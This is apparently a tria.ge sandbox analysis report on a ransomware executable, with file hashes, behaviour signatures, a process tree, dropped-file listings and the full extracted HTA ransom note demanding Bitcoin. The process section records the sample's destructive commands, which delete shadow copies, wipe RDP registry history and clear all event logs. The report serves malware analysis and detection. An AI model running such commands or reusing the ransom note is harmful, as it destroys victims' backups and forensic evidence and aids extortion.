Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

Vicebghcfg...xe.exe

windows7-x64

10

Vicebghcfg...xe.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    162s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/08/2023, 18:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Vicebghcfggghc4_browsingExe.exe

  • Size

    149KB

  • MD5

    7328af3a365df9561a55e86421fb81c0

  • SHA1

    6cfb5b4a68100678d95270e3d188572a30abd568

  • SHA256

    4dabb914b8a29506e1eced1d0467c34107767f10fdefa08c40112b2e6fc32e41

  • SHA512

    d36bc6ff51047aecacbafd92af6581e766d9b38720c5d9443f96a58e213c33a50291d578b18dc77f9b6977eaae712764aa0b49da82c0a9e3fb264e93b0033369

  • SSDEEP

    3072:kudyVkuftDR6PhpKHxf09vLOn8LlB9MJ:kyVzpKHxfkv1l

Score
10/10
ransomware

Malware Config

Extracted

Path

C:\Read Me.Hta

Ransom Note
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'> <html> <head> <meta charset='windows-1251'> <title>[email protected]</title> <HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no"> <script language="JScript"> window.moveTo(50, 50); window.resizeTo(screen.width - 100, screen.height - 100); </script> <style type="text/css"> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background: #EDEDED; } img { display:inline-block; } .bold { font-weight: bold; } .mark { background: #D0D0E8; padding: 2px 5px; } .header { text-align: center; font-size: 30px; line-height: 50px; font-weight: bold; margin-bottom:20px; } .info { background: #D0D0E8; border-left: 10px solid #00008B; } .alert { background: #FFE4E4; border-left: 10px solid #FF0000; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note .title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note .mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } .footer { position:fixed; bottom:0; right:0; text-align: right; } </style> </hta:application></p> <div class="header"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=" /> <h2><span style="text-decoration: underline; color: #000000;"><strong><em>All your files have been encrypted!</em></strong></span></h2> </div> <div class="bold">All your files have been encrypted due to a security problem with your PC.</div> <div class="bold">If you want to restore them, write us to the e-mails:&nbsp;<span style="color: #800000;"><a style="color: #800000;" href="mailto:[email protected]">[email protected]</a></span>&nbsp;and&nbsp;<span style="color: #ff0000;"><a style="color: #0000ff;" href="mailto:[email protected]">[email protected] </a></span>&nbsp;and&nbsp;<span style="color: #800000;"><a style="color: #006400;" href="mailto:[email protected]">[email protected]</a></span><span style="text-decoration: underline;"></span></div> <p>(for the fastest possible response, write to all 3 mails at once!)</p> <h4 class="bold"><span style="text-decoration: underline;"><em><strong>Write this ID at the beginning of your message:</strong></em></span></h4> <p><span style="text-decoration: underline; color: #0000ff;"><em><strong>1536D16561BC1B613F22085410918DE8334A5743474C26FAAA29E42213B466 1958FE8000C16FBF152CE96B9BE1665FFE834B40D0CEC730D496C993A32B43 D09E6D82C679270F7DB736E250A28DEC4BC38D574B03CFA37830D6EE524CA5 2A87AEBE66E501BBB247E683F9458466B2846175D1DC21F31FF41B063D260A 3E159137C2976C41635A6A013ED14D91552FD060596D4422FBE8ADF4285B8E B9B18D809A051D95AF9945862FAD1C31D396D8C2BB74ED126A9CD2882396B3 00E893316D83237821A76F4809EC8B17B5D0B39122E1005BD38474E7FC52CA EBBC03110A6EC1F5A3BD6B3753F3423DC873F20A0B1E384D40E21C7F756E43 C3BDC32B0F33B98CA9BFC0BD5C423D674B5444D9B32E005F2974A694A9A82E 6B104E5A3F83AD0A1D946FE54E519FDCF91B94324A3365C77F4A54A6820F98 07FD3035060A4B132F717D45570E079A25CE38A70B0E3FC192C5936DC75740 598D39D0F266E4025ADD7B0B5B1AE7D179B02D804B0063373166D2FACF4F9B 311CDC845D6178F79DC0C013890EC23B7F0A2CBB1BE6DAC511B790353E4CAD 957988BCC3C009691D9B0B39B005B1A8F671057A1CC650A718930D7A985FC7 9F4E023B393E3BFAE23033B323B4110D0D34C117CAFA2E3E4C4FD527C712BF 5049181251272924E90F804991381E5BE17449FE823E06C513C0F597618C85 DC0F00FC222D12095BA9203450CEC9A13A3479241F8B28751405D27269F598 21BE7F57DDAF53AC1D44CA84AA4329296095C1741A030FF8B66A29365D0ED5 1F68633CD64B025EC7B43EA0535F21946684E2EB065D7E52C80CEF1742DC71 E1B5B1572E88EE300E4F7E06979D3907BDDA82596DD28275CFA70A676AD73D D0355E930C60675C4E23BD70D6BA63456EE5A28D37DBF2D77F87311FDECA13 7DCFC2C70C30E3BD66F427B822C69A4EA5766FF5A8039542CFCFD3B723162E 4CACA5B5023692E61B3912DF9B05C8213359BD4440302526CC3F847D250D4D 1D0BA418523C461BD8713C1453C421FE3858091112F377369F60D9291C2C65 B1B77822D14CB4412C6278CCBD58E6DCDBAE58FE0300BDB4DADBDD02F8F496 53FF05F47529495CB232DC233286346A888FBBF11FBD191AFAAD0F270F56C1 4801 </strong></em></span></p> <div> You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. </div> <div class='note info'> <div class='title'>Free decryption as guarantee</div> <ul>Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 5Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) </ul> </div> <div class='note info'> <div class='title'>How to obtain Bitcoins</div> <ul> The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. <br><a href='https://localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a> <br> Also you can find other places to buy Bitcoins and beginners guide here: <br><a href='http://www.coindesk.com/information/how-can-i-buy-bitcoins/'>http://www.coindesk.com/information/how-can-i-buy-bitcoins/</a> </ul> </div> <div class='note alert'> <div class='title'>Attention!</div> <ul> <li>Do not rename encrypted files.</li> <li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li> <li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li> </ul> </div> </body> </html>
Emails

<title>[email protected]</title>

href="mailto:[email protected]">[email protected]</a></span>&nbsp;and&nbsp;<span

href="mailto:[email protected]">[email protected]

href="mailto:[email protected]">[email protected]</a></span><span
URLs

http://www.w3.org/TR/html4/strict.dtd'>

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Renames multiple (4006) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Vicebghcfggghc4_browsingExe.exe
    "C:\Users\Admin\AppData\Local\Temp\Vicebghcfggghc4_browsingExe.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:3684
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3844

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Read Me.Hta
    Filesize

    7KB

    MD5

    c328a20f8b635cc711dd75a64303719e

    SHA1

    01651e52a66f8c3212dbf1085d754a8aaaaa4c51

    SHA256

    fd5c95209d5ad6c6cc192308c440bbe9b92fc32d3d507666bca0a7a2f4b1673c

    SHA512

    dd7d4a3c2ef9600c060249f6ab351db91d9ba847994f28145f067d72d91919ca10b51487699af7a99c5e7087b4cbf46c101b06bdb45e1c31141118dc4c076b1d

    Download Submit

  • memory/1676-1992-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1676-2051-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1676-8560-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1676-8598-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1676-9739-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1676-10658-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1676-12050-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1676-14529-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1676-14972-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

    Download